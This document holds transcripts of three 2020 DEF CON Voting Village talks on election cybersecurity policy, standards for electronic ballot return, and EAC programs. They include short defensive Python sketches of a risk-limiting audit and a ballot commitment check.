10.5446/50753 (DOI)
Hello. It's nice to be here. Thank you for joining this session. I'd like to talk today about a policy approach to resolving cybersecurity problems in the election process. One thing's for sure: after the coronavirus is no longer dominating the news, election security will come back to center stage in a big way. It is a complicated subject that few people really understand, even election officials. So today I want to talk about the role that private sector companies play in the voting system, the vulnerabilities associated with their role, and a path forward from the legal and policy perspective. Election security is really a private sector problem, because so many aspects of it are performed by private sector companies. There are many avenues for tampering with an election, including changing votes, causing machines to malfunction, altering voter registration records, and disrupting equipment used to check in voters. Private sector companies play a large role in what we call the election process: voter registration, checking in voters, voting, polling, and tabulating the votes. They sell the voting machines and program them for most elections. Yes, in most jurisdictions they program them for each individual election. They register voters, they tally votes, and they report votes. And there are vulnerabilities associated with their role that most people don't understand. People think this is all controlled by state and local election officials, and it is not. So today I want to talk about a path forward and how to solve this huge, complicated problem.
Let's look at the vulnerabilities in the voting equipment. In 2005, Harri Hursti performed the famous Hursti Hack and successfully altered votes in a one-step hack that changed both the central tabulator results and the voting machine's results tape. It was the digital equivalent of stuffing the ballot box. The election official who invited Hursti to check the Diebold AccuVote optical scan voting machines said he wouldn't have been able to detect the change and would have certified the election. Diebold's election business is now owned by Dominion Voting Systems. None of the vulnerabilities found by Hursti were ever fixed, and these same machines are planned for use in 20 states in the 2020 election. Think about that. It's 2020 and he discovered this in 2005, 15 years earlier. That's crazy. A later model of the same voting machines, with the same vulnerabilities, was used in the hotly contested and disputed 2018 election between Stacey Abrams and Brian Kemp in Georgia. So many jurisdictions are using machines with these vulnerabilities. In recent elections, 99% of votes in the US were cast or counted on computers. And many of the core election systems, the voter registration databases, election management systems, voting machines, and vote counting systems, run on aged computer equipment. These systems employ software that can no longer be updated or patched. They include databases with known vulnerabilities, and they're managed by third-party vendors where supply chain risks exist. This is a big problem. Let's look at the cyber attacks on these private vendors. In 2016, Russia's military intelligence service penetrated VR Systems. VR Systems is the vendor that manages and handles all of the programming for the majority of the counties in Florida, and it handles all absentee ballots and early voting. We know of this penetration because an NSA contractor, Reality Winner, released a top secret report about it.
And we later found out the FBI briefed election officials in Florida on a very secret basis. It was a year later that election officials around the country realized that Russia's military intelligence service had been penetrating VR Systems, and that perhaps their own systems might also be vulnerable. In the 2016 elections, electronic voter ID systems in several states went down in certain precincts. These are the systems that help identify a voter when they come in to vote. And these "technical glitches" in the machines, as they were called, caused hours-long waits for people who had come to the polls to vote. Hours-long waits. Some voters were unable to wait, and others could not vote before the polls closed. On election day in 2019, federal officials from law enforcement, Homeland Security, and the intelligence community issued a joint statement declaring that our adversaries want to undermine our democratic institutions, influence public sentiment, and affect government policies. Russia, China, Iran, and other foreign malicious actors will all seek to interfere in the voting process or influence voter perceptions. Wow. And it's true. We have a serious problem. We have governments outside the U.S. trying to influence our democratic processes, and we have voting machines, voter ID systems, and private sector companies that have not presented any level of assurance that their processes and systems have integrity and are secure. So we have a U.S. Election Assistance Commission, and this commission is supposed to help election officials around the country, but it's perhaps the weakest link in the nation's voting system. The EAC is a bipartisan commission established by Congress in 2002. It maintains the national mail voter registration form. It accredits testing laboratories and certifies voting systems, and it serves as a national clearinghouse of information on election administration.
In December 2016, Recorded Future reported that a Russian-speaking hacker named Rasputin was selling access to EAC systems on the Internet. Rasputin had full admin access to the database and could upload any file he wanted. He had lists of voting machinery and test reports of their software, and knew where they were deployed. An EAC employee whose credentials had been compromised said that if Rasputin had access to the database, he could access the server where the proprietary information is kept. The EAC keeps information about vulnerabilities in voting systems. Thus, a hacker who gets into the EAC could find out where the weak links are in voting systems all around the country. So let's look at the voting machine companies and the role they have played in this. They have been recalcitrant and arrogant. Researchers and cyber experts have found multiple vulnerabilities in the most-used voting machines that would enable an attacker to gain full access to a system, change configurations, and install a modified operating system without election officials knowing. These vulnerabilities can enable hackers to change an election, shut the system down, remotely execute code, and tamper with ballots offline. There are three primary vendors for voting machines: Election Systems & Software, known as ES&S; Dominion Voting Systems; and Hart InterCivic. We know there are vulnerabilities in most of the voting machines, but very little is known about the security of these companies' own IT systems. These are the companies that produce and maintain the voting machines that are the core underpinning of our election process, and very little is known about the security of the companies themselves. Some voting machines are optical scanners, some have touchscreen voting, some use QR codes or barcodes, and others send votes in clear text back to vendors to be tallied. They can all be hacked or compromised.
If almost all the voting precincts in our clunky system use equipment from these vendors, an attacker only needs to hack the equipment to reach all of the voters. Unlike major technology companies such as Apple and Microsoft, these vendors do not allow researchers to test their equipment and review their code to find vulnerabilities and bugs. The symbiotic relationship between tech software and hardware vendors and researchers helps vendors improve their products and keep them secure, but this is not happening when it comes to voting machine manufacturers. They will not let researchers have access to their equipment. Voting equipment companies have been highly resistant to any review by the research community, claiming their systems are safe and secure, yet they have failed to fix identified vulnerabilities in the voting equipment. They repeatedly claim everything is fine, we're all secure, this is a priority, we take this seriously, America's vote is our basic concern, and yet they haven't fixed vulnerabilities that researchers found 15 years ago. They let their voting machines be out front and used for voting knowing there are vulnerabilities in them. I guess they think no one's going to exploit them, but to cover that up and say they're all safe and sound, that's just wrong. During the three years of the Voting Village's existence, and I think most of you are familiar with the Voting Village, none of the vendors have supported the effort, nor have they been willing to donate or offer equipment. The researchers in the Voting Village are dedicated to this because, one, they want to help develop a community of cybersecurity experts in election security. There are not very many experts out there who know how to deal with voting machines and their cybersecurity problems and how to solve those vulnerabilities. And two, they want to make the voting machines and equipment more secure by letting these vulnerabilities be known.
The problem is the vendors are doing nothing about it. And apparently the election officials also are not requiring them to fix these vulnerabilities before they have another election. So that's a big problem. So I want to put forth a proposal to address this problem and achieve results. Certain actions can be taken at the federal level that will push a standardized approach out to state and local election officials and will require certain actions to be taken by private sector companies. Article I, Section 4 of the U.S. Constitution grants Congress the power to regulate the times, places, and manner of holding federal elections. Federal elections are the elections of senators, representatives, and the president. Now, state and local election officials are responsible for conducting all elections, but they depend on infusions of federal funding to supplement their state and local funding. State and local officials can't really afford to have separate equipment and systems, one for state elections and one for federal elections. So when Congress mandates certain requirements for federal elections, they pretty much have to go along with them, because they only have one system for voting. Therefore, if Congress sets requirements for federal elections and restricts the funding that state and local election officials need to only those election agencies that adhere to the federal requirements, we will begin to see consistent actions taken across the U.S. that will tighten cybersecurity in the election process. The proposal I want to go over with you today is such a proposal: federal requirements set by Congress. The first would be to direct NIST, the National Institute of Standards and Technology, to establish federal standards for cybersecurity.
NIST is the entity in the government that has established all the Federal Information Processing Standards. It has established the cybersecurity best practices and standards that federal agencies, and certain federal contractors, have to adhere to. So NIST has a deep bench of expertise not only in standards and cybersecurity, but in secure engineering practices. And it would be appropriate to direct NIST to develop federal standards for the cybersecurity of our election system software, infrastructure, and hardware, all three levels, as used in voter registration, voting, vote tallying, and polling, and in the manufacturing, servicing, and writing of election parameters of voting machines and equipment. The first part covers the systems: the infrastructure, the hardware, the software, and the networks they're using. What are the standards for those? Because they are used in registration, in tallying, and in voter polling. Again, this isn't just one machine you go to the polls and vote on. It is registering to vote. It is signing in and being ID'ed. It is voting. It is tallying the votes. It is polling the voters, and it is reporting the votes. All of these actions are largely performed by private sector companies, and we have no idea whether their cybersecurity programs are mature or not. We suspect they're not very mature, but that's just a suspicion. We should have a standard saying they must meet these requirements. Our democracy depends on it. That's worth the standard. Then we have the manufacturing and servicing of voting machines and equipment. Absolutely. We want these vulnerabilities fixed. The machines need to be serviced and maintained and have integrity. The writing of election parameters means the programming of these machines. In most jurisdictions, the private sector companies program these machines for every single election. We need standards to govern how that's done.
Second, we should direct NIST to establish a certification process for the security and integrity of election systems, software, infrastructure, and hardware, and the associated components and modules of the election process. There should be a certification process to make sure they're meeting the standards. Next, we should direct NIST to analyze the private sector's role in the election process and recommend any roles or functions that should be changed or restricted to public sector election officials. There are some roles being undertaken by private sector companies that perhaps should not be a private sector activity. Perhaps those roles should be strictly a governmental function. Let NIST analyze that in all of their work in establishing the federal standards and the certification process, and recommend to Congress roles that should perhaps be reserved to the public sector. Next, we want Congress to pass a law restricting federal funding to only those election jurisdictions that, one, use such funding in a manner consistent with the NIST federal election standards; two, require annual cybersecurity assessments by an independent third party of all the systems in the election process, in accordance with the standards; and three, require annual cybersecurity assessments by a third party of all private sector companies involved in the election process, in accordance with NIST standards, with those assessments made available to the election officials contracting with them. A company may get a cybersecurity assessment but not share it. We want these vendors to have to get third-party assessments every year and share those assessments with the election officials contracting with them. And we want the election officials to get third-party assessments of their own systems in accordance with the NIST standards. This is what private businesses do every day. That's what's required of them.
This is not asking too much of election officials or the private sector vendors that support the democracy this country has been built on. We also want federal funding restricted to those jurisdictions that establish requirements for post-election auditing of votes, at least on the level of risk-limiting audits, and that make the findings public. So we are restricting federal funding to only those jurisdictions that comply with the NIST standards, that conduct risk assessments themselves, that make their vendors get assessments, and that have post-election auditing. There's precedent for this. Congress has passed laws in the past to restrict highway funds to only those jurisdictions that lowered the speed limit to 55 miles an hour. Congress has restricted funds to only those school districts that adjusted their cafeteria menus to comply with the new recommended federal menu. There are numerous other examples; Congress has in several instances tied its federal funding to meeting certain requirements. There's nothing more important than having our federal funding tied to the requirement that our vote counts, that every vote should be counted and counted as cast. The American Bar Association, which represents over 400,000 attorneys, recently adopted Resolution 118, which calls for these exact measures. Cybersecurity best practices and standards can help. Election security is not going to get solved overnight, but standing up a cybersecurity program for election agencies that is in compliance with cybersecurity best practices and standards will be a big first step. Congress may not pass a law right away, but election officials should already be doing this. They should already be saying: there are NIST standards for cybersecurity programs, there are ISO standards, there are multiple standards out there for cybersecurity programs, and every single vendor should be adhering to them.
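The risk-limiting audits mentioned above have a simple statistical core. Below is a minimal sketch of a ballot-polling audit in the style of the BRAVO method; the function and parameter names are illustrative, not taken from any official RLA tooling. The idea: sample ballots at random and update a sequential test statistic until the reported outcome is either confirmed at the chosen risk limit or the audit escalates to a full hand count.

```python
import random

def bravo_audit(ballots, winner, loser, reported_winner_share,
                risk_limit=0.05, rng=None):
    """Ballot-polling risk-limiting audit sketch (BRAVO-style).

    Samples ballots with replacement and updates a sequential test
    statistic; once it exceeds 1/risk_limit, the reported outcome is
    confirmed at that risk limit.
    """
    rng = rng or random.Random()
    threshold = 1.0 / risk_limit
    s_w = reported_winner_share       # winner's reported share of winner+loser votes
    t = 1.0                           # sequential test statistic
    for samples in range(1, len(ballots) + 1):
        ballot = rng.choice(ballots)
        if ballot == winner:
            t *= 2.0 * s_w            # a winner ballot strengthens the evidence
        elif ballot == loser:
            t *= 2.0 * (1.0 - s_w)    # a loser ballot weakens it
        if t >= threshold:
            return True, samples      # outcome confirmed at the risk limit
    return False, len(ballots)        # not confirmed: escalate to a hand count
```

With a reported 60/40 split and a 5% risk limit, a clean sample confirms the outcome after a couple dozen ballots rather than a full recount; discrepancies drive the statistic down and force escalation, which is exactly the accountability property the proposal asks jurisdictions to adopt.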
The vendors are not only using equipment with vulnerabilities; their own networks and systems are vulnerable as well. So it's time election officials step up and take action, even before Congress does. Election officials should require election vendors to meet cybersecurity standards and best practices, conduct annual risk assessments of their programs' maturity, and do what every other business does: manage its risk. In addition, they need to follow the lead of California and other jurisdictions and hire experts to test the security of their voting machines and equipment, and then demand that vendors close any vulnerabilities found. Why are these officials letting machines with vulnerabilities that have been known for 15 years be used in their jurisdictions? That's crazy. They need to demand these vulnerabilities be fixed, and they need to join with each other nationally to ensure that those machines are not used in elections. So legislation and other reforms are needed, but election officials can achieve these things through their own direction and in legal agreements with their election vendors, and they should begin now and do as much as possible before November. Thank you very much.
Cybersecurity researchers keep identifying cybersecurity vulnerabilities in voting machines and in the election process, but not much happens in closing identified vulnerabilities. The private sector vendors involved in voter registration, manufacturing and programming voting machines, and vote tabulation are less than responsive, and few have provided evidence that they have strong cybersecurity programs that meet best practices and standards and regularly have cyber risk assessments performed. This presentation will put forward a federal policy approach that will help correct these problems and advance the integrity of elections across the country.
10.5446/50755 (DOI)
Good afternoon, Voting Village. My name is Forrest Senty. I'm the director of business and government affairs at the National Cybersecurity Center. And I'm Maddie Gullickson, and I'm the program manager for Secure the Vote. We'd like to thank all of you for having us here today. We're excited to have our presentation accepted to the Voting Village, and we look forward to future years in our work in elections. So we're with the National Cybersecurity Center. We're a 501(c)(3) based out of Colorado Springs, Colorado. We were founded in 2016, and a lot of our big focus has to do with cyber innovation and awareness and solving real-world cyber problems. We work in areas like space, where we actually have a presentation from one of our fellow colleagues in the Aerospace Village today, as well as areas like smart city technology and K-12 education, the future of the cyber workforce. Our presentation today is about electronic ballot return standards and guidelines, titled The Future of Voting. I want to start off by talking a little bit about who we are, what the program is, and how we fit into this whole picture. I want to acknowledge that Secure the Vote is a nonpartisan, multi-agency, multi-policy group that goes after a layered challenge. Groups like the EAC, CIS, the Elections Infrastructure ISAC, and even groups like Verified Voting, MIT, and the Alliance for Securing Democracy all tackle different aspects of our election security problem in the US. And the combination of all of these has led to a brilliant ecosystem in the United States that allows us to publish, listen to, and advocate for different policies, standards, and guidelines, whether at the federal or the state and local level. A lot of our focus has primarily been on the ways we can identify different gaps in critical infrastructure related to elections.
So the first gap that we've really identified, and the reason why we're here today, is the gap where security sits in the conversation about election technology. Over the past four or five years, security has become an ever more heightened focus in the role of election security. We're not going to claim to be the new experts, but the biggest thing for us is identifying the critical piece of the future of voting technology. What we've identified is that security, cybersecurity specifically, is a barrier to the future of election technology. What that looks like is that for people with disabilities, or overseas voters, or even the everyday person who might have an emergency come up so they can't get to their mail ballot or to in-person voting, there are more and more calls, especially after the pandemic, for other ways to vote. But the community agrees that security is an issue and is a barrier to how far these technologies can go. And that's why we're interested in this conversation today. A little more about us and how we've learned about this space: our program was started in the middle of 2018, specifically to work on helping address security issues for overseas voters. Since then, we've participated in reviewing election law, and we've gotten feedback from jurisdictions and 10 pilots involving the use of mobile and online voting between 2019 and 2020. And like all critics of online voting point out, in every single pilot we saw the need for enhanced security in these technologies. We also saw increased demand. Of the pilots we worked in, there was at least two-to-one, in some cases three-to-one, demand for more places to use it. But the number one reason people chose not to use it is security concerns.
So the more we try to understand these technologies and the different things that address the gap between where we are today and where we need to be tomorrow, the more consistently we see, among election officials, the security community, and the academic community, that these technologies are not going away, that the desire for them is growing, and, to go back to the beginning, that security is still a barrier. And through those pilots, some of the things we have seen as part of that core security problem are: a critical need for end-to-end verification of votes that maintains the secrecy of the ballot; a critical need for common standards around voter verification procedures and policies, since there are really no federally mandated or even state mandated requirements around these newer technologies; and a need for common standards around voter information privacy procedures as well. One of the biggest concerns is the vulnerability of voters' own devices, which may have problems on them that could hurt the system and interfere with the vote. So we really need to have a system and standards in place that these newer technologies can be held accountable to. We need pre-election reviews and post-election reviews. We need the same level of guidelines that the Voluntary Voting System Guidelines from the EAC provide. And that's really where we're working: we have a working group that is looking at these different issues, and we continue to look at them through the pilots. Ultimately, we're working on these questions because even in 2016, there were about 3 million overseas voters who were eligible to vote, but only 6.9% of them actually submitted a ballot, compared to a 72% rate for domestic voters who were eligible to vote.
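The "end-to-end verification that maintains ballot secrecy" called for above is, in real systems, built on heavyweight cryptography such as homomorphic encryption, mix-nets, and zero-knowledge proofs. As a toy illustration of just one ingredient, the recorded-as-cast inclusion check, here is a salted hash commitment a voter could verify against a public bulletin board. The function names are hypothetical, and this sketch omits everything a real end-to-end verifiable protocol needs (tallying, coercion resistance, board integrity):

```python
import hashlib
import secrets

def commit_ballot(ballot: str) -> tuple[str, str]:
    # Commit to a ballot with a random salt; only the digest is published,
    # so the public board reveals nothing about the ballot's contents.
    salt = secrets.token_hex(16)
    digest = hashlib.sha256(f"{salt}:{ballot}".encode()).hexdigest()
    return digest, salt   # digest goes to the public board, salt stays on the voter's receipt

def verify_inclusion(board: set[str], ballot: str, salt: str) -> bool:
    # Voter-side check: recompute the digest from the receipt and confirm
    # the public board recorded the ballot as cast.
    return hashlib.sha256(f"{salt}:{ballot}".encode()).hexdigest() in board
```

The salt is what reconciles verification with secrecy: without it, anyone could test digests against candidate names; with it, only the voter holding the receipt can check their own entry.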
We're doing this because if disabled voters had had the same access that voters without disabilities had in the 2018 election, we would have seen about 2.35 million additional voters participating in the system. Ultimately, we live in the 21st century, and we shouldn't accept that people living overseas or with disabilities don't vote because they struggle with access to voting centers or because they lack the privacy to do so. And this slide in particular just demonstrates that technology is already part of voting and part of our infrastructure. Email and fax are already used by over 31 states, and web portals are allowing people to return a ballot online. The technology exists, and it's moving in that direction. Again, we just believe there needs to be a common set of standards and guidelines to provide guardrails as this technology develops. When we look back at our progress in voting, one of the biggest things that drives home the point Forrest was making is that most of our legislation around voting has had to do with undoing policy barriers that have actively kept people from voting. For the 21st century, what is that going to look like? It's going to look like undoing the barriers of technology and security as the things that prohibit people from voting. And so as we look to that future, we want to participate and collaborate with as many people as possible to figure out what that future state of voting looks like. What is the timeline going to look like for the legislation and the technological advancements we see over the next 10 to 30 years? These are some ideas, some of the things we'd love to see happen. And we understand the concern about these types of technologies being used today. But the point is that this isn't going away. And so how do we work together?
How do we come together to figure out how to make these things happen? Because we believe that with the collective genius of the elections community and the security community, we can make end-to-end voter verification a reality. We can make full-scale citizen audits of these systems a reality. And so this is what we envision when we see the timeline going forward, and what gets us excited about it. Among the different organizations we've worked with, blockchain is one of the technologies that people have used. Is that the right way? Does it complicate things, or does it make things safer? And then we can look at AWS as a secure cloud service. Is that the right way? These are the kinds of conversations we need to be having, not just the binary conversation of whether it should or shouldn't happen; the fact is that it is happening. And so we have to have the conversation about what this looks like moving forward. And really, that's the full circle of why we wanted to come to the Voting Village: we want feedback. We know so many of you have thought through these things, and we want to provide a place where you can offer your advice and feedback on how we can make these things the safest, the most secure, but ultimately the most accessible, because that's the whole point of this thing in the first place. And to get really sentimental about voting, it is truly the bedrock of our representative democracy. If we still have significant barriers to voting, the integrity of that institution itself is undermined. So we want your feedback. If you have thoughts, or even questions, please email us at securethevote@cyber-center.org. We will also have an RFI going live this month for solutions to some of the key issues we talked through that are associated with mobile or online voting. So please email us to receive a notification when that goes live.
And email us if you've got that next brilliant idea for how to tackle a piece of this. Absolutely. Well, a big thanks again to the Voting Village for having us. We want to thank you and reaffirm that this is not just a security community issue. This goes out to all the different election officials, government organizations, nonprofits, and think tanks out there that are all working on this. Whether you're against it or for it, this is a component that will keep driving into the future. And if it's going to happen, the best thing we can do is make it as secure as possible. So thank you. Hi, this is Colorado Governor Jared Polis, and I want to thank everyone involved with this effort to secure the vote. Voting is the most sacred right that we have in America. It's the right that protects all of our other rights, which means we need to do everything we can to safeguard voting. I'm proud that Colorado has been a national model for voting rights. With our all-mail ballot system that guarantees a paper trail for every vote, same-day registration, and so many other protections, we're not only recognized as one of the most secure election states, but one of the top states for voter participation and turnout as well. But we can't rest on our laurels and our past success. We need to continue to meet the challenges of today and tomorrow. Which is why I'm proud of the initiative led by the National Cybersecurity Center, started right here in Colorado: the Secure the Vote pilot program, where over 4,000 Coloradans used a blockchain-secured mobile voting application to cast their vote. That program from Denver has since expanded to six other states, and now includes other technologies to secure our vote and empower voters. Free and fair elections are the bedrock of democracy, and we need to work together to protect the integrity of our elections.
Thank you for your work on this critical and important initiative to make sure everyone has confidence that their vote will be counted. Good afternoon. My name is Jocelyn Bucaro. I'm the director of elections for the City and County of Denver, and I want to thank the National Cybersecurity Center for the invitation to be a part of this video. I am here because COVID-19 has highlighted the need for more options for voters to vote safely and securely, particularly voters with disabilities. Many states already offer some form of electronic delivery and return for some voters. But unfortunately, these voting technologies exist without robust standards for safety and security. This crisis has shown why we can't wait. We need all levels of government, security, policy, and technology to join with election officials to establish better standards and guidelines and to implement new technology solutions so all voters can vote safely and securely. Thank you so much. Hi, my name is Amelia Powers Gardner. I'm the Utah County Clerk/Auditor, and I'm here to bring you a challenge, one that I'm confident you can accomplish. As you know, this week we marked an important milestone: astronauts safely returned to Earth from the space station for the first time aboard a private vessel. Add to that the fact that we have put men on the moon, can 3D print internal organs, and even have emerging technology that can edit DNA. Technology has radically transformed the human experience and solved a great number of our challenges, both large and small. It's time to start finding voting solutions for the 21st century. It's no longer acceptable to suppress the votes of an entire demographic, or to accept low voter turnout because of weather, natural disasters, or a pandemic. Mobile voting is the future of elections. Upcoming generations demand it, and our current generations need to embrace it as a solution to age-old problems with voting.
Our current voting methods require extensive logistics and cost a lot of money while still failing many voters, including those with disabilities, those with lower socioeconomic status, and our men and women serving us in the military. It's time to stop saying it can't be done and it is time to start finding a way to do mobile voting. The industry needs to create standards that innovators can strive to accomplish and that election administrators like myself can use to judge potential solutions by. Join me in improving the way we do democracy in the 21st century. Thank you.
The emergence of new electronic ballot return methods creates an opportunity for greater voting access and potential enfranchisement, but also raises security concerns in an increasingly tumultuous cyber-election landscape. The challenge of security is further compounded by a lack of proactive guidance from the federal level on developing these new technologies, leaving a gap in guidance for developers of these technologies seeking to adopt an elections-appropriate framework and approach to security. Experts from the National Cybersecurity Center (NCC) will offer a draft of security guidelines for the new electronic ballot return platforms to consider, and for federal agencies to adopt. The guidelines' format mimics the Voluntary Voting System Guidelines created by the Election Assistance Commission.
10.5446/50756 (DOI)
Good afternoon. My name is Ben Hovland and I'm Chairman of the U.S. Election Assistance Commission, or EAC. I appreciate the opportunity to speak at this year's virtual voting village. I wish I were able to be there in person. Last year I certainly enjoyed the experience and saw a real step forward in the dialogue and discourse around making our elections more secure. I'll jump into that more in a minute, but for some background, I wanted to start by talking about the EAC and what we do. The EAC was established by the Help America Vote Act of 2002, or HAVA, which was Congress's response to the Florida 2000 election. The EAC is an independent bipartisan commission charged with ensuring secure, accurate and accessible elections by developing guidance to meet HAVA requirements, adopting the Voluntary Voting System Guidelines, or VVSG, and serving as a national clearinghouse of information on election administration. The EAC also accredits testing laboratories and certifies voting systems, as well as administers the use of HAVA funds. We are a small agency, which you might not know by the attention we get. We certainly try to punch above our weight class as an agency with one of the smallest budgets in the federal government. But as an agency, we are committed to providing helpful and up-to-date information to promote the continuity and integrity of election administration, despite new challenges such as COVID-19 and cyber interference. In FY20, the EAC received a budgetary increase from our all-time low, and as an agency, we focused on investing these precious resources wisely in a way that would help the elections community. I'm pleased to be able to tell you today that a number of our new initiatives are already underway and hopefully are already making an impact.
As part of our efforts, the EAC launched the Cyber Access and Security Program this April to provide access to security training, best practices, expertise, and other assistance for election officials and their IT staff. An important part of this program has been the addition of staff who have a range of experience in the cybersecurity and elections fields, including years of expertise in software development and security analysis. The program partners with public and private security experts with a goal that election officials will have access to the most up-to-date and best-in-class information available through the EAC's Clearinghouse. One of the Cyber Access and Security Program's first projects was in response to a concern we'd heard from election officials about the volume of cyber expertise and recommendations being developed around the election space, and how it would be helpful to have an organized repository. The EAC's election security preparedness page is designed to be a one-stop shop for election cybersecurity guidance. It includes resources from federal agencies, nonprofits, academia, and local election officials. These resources include the work of a number of individuals associated with the voting village, so thank you. The page was recently updated with new guidance on security topics that have developed since the 2016 election, and it's been reorganized to make the information easier to find and use. In addition to pulling resources together, we've recognized that many of the great resources that have been produced only realize their full benefit if election officials have a solid foundation to view them from. With that in mind, in June, the EAC announced online cybersecurity training offered at no cost and developed specifically for election officials through a partnership with the Center for Tech and Civic Life, or CTCL.
The online training consists of both video and written materials separated into three modules: Cybersecurity 101, 201, and 301. This is self-paced training and it provides foundational knowledge on cybersecurity terminology, best practices in election offices, practical applications, and communication around cyber incidents. We hope this is a resource that can benefit any local election official and their staff. We've been promoting it to local election officials, and you can too. This is available to every state and local election official in the country at no cost through May of 2021. So far, nearly 200 state and local election officials who are responsible for running elections for millions of voters, along with their partners, have completed this training. We plan to continue to focus on training efforts going forward, particularly if our funding trend continues. I would also mention that later this month we're launching both a risk management and a crisis management online workshop for state and local election officials. Along those lines, in a joint effort with CISA, we'll be hosting an online risk management tool allowing election officials at the local level to easily measure and mitigate risks to their specific environments. Finally, our cyber access and security team is updating materials currently posted to the EAC website and is working to develop new material related to vulnerability disclosure programs, social engineering mitigation, and other education efforts. Another area our cyber access and security team has been working on is non-voting election technology, not the best name, but an area of great importance when it comes to securing our election infrastructure and maintaining public confidence in the electoral process.
First and foremost, I think we all recognize that when you look at the cyber risk profile of elections, non-voting election technology like poll books, election night reporting, and statewide voter registration databases are all potential targets. This is not a secret. Everyone's been talking about this since 2016, and in fact there have been a number of bills introduced in Congress to try to do something about the fact that we don't have standards or a certification program for this type of technology, even though some states do. We know, however, that the nature of these systems doesn't necessarily lend itself to a Voluntary Voting System Guidelines-style certification program. With that in mind, the EAC has partnered with the Center for Internet Security, or CIS, and a number of states to pilot a technology verification program focused on non-voting election technology, including, as I mentioned earlier, electronic poll books, election night reporting websites, and electronic ballot delivery systems. This program is called Rapid Architecture-Based Election Technology Verification, or RABET-V. It relies on a risk-based approach that allows rapid verification of manufacturers' security claims. The RABET-V pilot program supports agile software development with a verification process that anticipates and supports rapid product changes. The goals of the pilot program include incentivizing high-quality, modern design of IT systems, and smaller, more manageable update cycles that reduce the costs of verification and re-verification, with more reliable and consistent outcomes for the purchasers of these systems. I'm excited about the prospects of this pilot, but no matter what, I'm confident that we'll learn more about how to think about these technologies and can apply those lessons moving forward. We're committed to expanding the EAC's clearinghouse function to include information and best practices around non-voting election technology.
Speaking of voting technology, certainly there's nothing more central to the EAC's mission than the Voluntary Voting System Guidelines. The VVSG are the benchmark for voting system usability and security across the country. Unfortunately, the standard that is primarily used was written over a decade ago, and therefore preceded many of the more recent technical innovations that we see in other areas of our lives. The update process for the VVSG is very public and very technical. We received over 1,600 unique public comments on the draft principles and guidelines; we heard from industry stakeholders, voting advocates, and members of the public. I'm hopeful that the VVSG 2.0 is on track to be approved by the end of the year. In order to meet that deadline, the EAC is working on several parallel paths addressing the VVSG 2.0 technical requirements, test assertions, the testing and certification program manual, and the voting system test laboratory program manual. So we've got our work cut out for us, but again, we're pushing through on this and working on all of these areas right now to try to get it done by the end of the year. Speaking of the end of the year, as we look at the 2020 election, it's certainly important to look back at the 2016 election and where we've come. As I look at the elections community, it has certainly come together and made tremendous progress since 2016 and the first voting village at DEF CON in 2017. The EAC regularly collaborates with partners at the federal, state and local levels. Earlier you heard from some of those federal partners at NSA, CISA and FBI. We also work with the National Association of Secretaries of State, the National Association of State Election Directors, and local election official organizations to help reach the nearly 9,000 local election officials across the country.
Today, election officials are better educated about cyber and physical threats to their systems and have access to resources to better help defend those systems. Manufacturers of voting equipment are also changing their behavior. They are reporting and sharing threat intelligence, opening up to researchers via bug bounty programs, and working with the EAC to issue critical software patches much more quickly. And certainly, it's hard to think about elections right now without thinking about the upcoming 2020 election and the impact of COVID-19; that's why this voting village has been done virtually. COVID-19 is presenting unprecedented challenges around our country, and the election administration community is facing real challenges in determining how to best conduct elections in this environment. At the EAC, we've pivoted substantially to focus our attention on how we can support state and local election officials as they learn from their primaries and make tough decisions about the general election. Between the CARES Act election funds and the earlier Consolidated Appropriations Act of 2020, the EAC has distributed about $825 million to the states this year to assist with federal elections. And we know this funding will be crucial because of the additional expenses related to running elections during the pandemic. For most jurisdictions, that means running the largest mail or absentee ballot election they've ever run, but also having safe in-person options as well, which means social distancing in the polling places and personal protective equipment being available. To address that, since April we've held public hearings. We've also hosted a number of Zoom videos or web chats where we've brought together experts from the elections field to discuss best practices and lessons learned on topics relevant to running an election right now during the pandemic.
We've heard about challenges and lessons learned from ramping up vote by mail and heard very practical examples and success stories, as well as pitfalls and how to avoid them. Because each state runs elections somewhat differently, each response to this pandemic has been somewhat different. The changes to the election process, we know, create an environment that could be taken advantage of for misinformation or disinformation. So certainly that is an area of concern and an area that we need to continue to work on. As you know, we've seen the dates of primaries change. You've seen processes and procedures change. There will be different polling places, because some are not available; maybe they were somewhere like a senior center that's no longer available. And so efforts like the National Association of Secretaries of State's TrustedInfo 2020 effort will be even more crucial. To the degree that folks from the voting village and other communities can help promote state and local election officials as that trusted source, pushing out information that we know is accurate and helping to combat disinformation is going to be crucial this election year. And speaking of ways for the voting village to help out, we know there's plenty of work to do and more work that needs to be done. Election officials, as I mentioned earlier, are absolutely working around the clock to adapt to the COVID environment, and they certainly can use assistance, as I mentioned before, on misinformation and disinformation. For researchers, one way to help is to responsibly engage with election officials and manufacturers. The Cybersecurity and Infrastructure Security Agency, or CISA, recently published a guide to vulnerability reporting for America's election administrators.
It walks election officials through the steps of establishing a vulnerability disclosure program so that researchers don't end up having their bug reports ignored or having their activities reported to the FBI as hacking attempts. Another way to help this year is to serve as a poll worker; reach out to your local election official to see if you can sign up. Matt Blaze has promoted this for some time, and I certainly appreciate his poll worker recruitment efforts. But this year, poll workers are needed more than ever. It's never an easy thing to recruit poll workers, but we've seen a significant dropout with COVID-19. Obviously, in a pandemic, it's a personal decision whether to serve as a poll worker. But if you're able and willing, that is desperately needed. In fact, the EAC is announcing September 1 as National Poll Worker Recruitment Day this year to try to help election officials around the country get enough poll workers. By encouraging more people to become poll workers in their communities, National Poll Worker Recruitment Day aims to address the critical shortage of poll workers, strengthen our democracy, inspire greater civic engagement and volunteerism, and help ensure free and fair elections in November and beyond. While the specific duties and compensation vary depending on location, poll workers are the face of the election during voting. Most jurisdictions task election workers with setting up and preparing the polling location, welcoming voters, verifying voter registrations, and issuing ballots. Poll workers also help ensure voters understand the voting process by demonstrating how to use voting equipment and explaining voting procedures. Poll workers with technical backgrounds are especially important in jurisdictions where newer voting equipment will be used for the first time and voters may need a little extra assurance to become comfortable with the new technology.
I hope to see you in person at next year's voting village. In the meantime, if there are ways the EAC can help or recommendations you have for us, please reach out. Let's keep the conversation going. And again, one last time, if you can do it, please consider serving as a poll worker. Thank you.
Remarks from Benjamin Hovland, Chairman of the US Election Assistance Commission
10.5446/50757 (DOI)
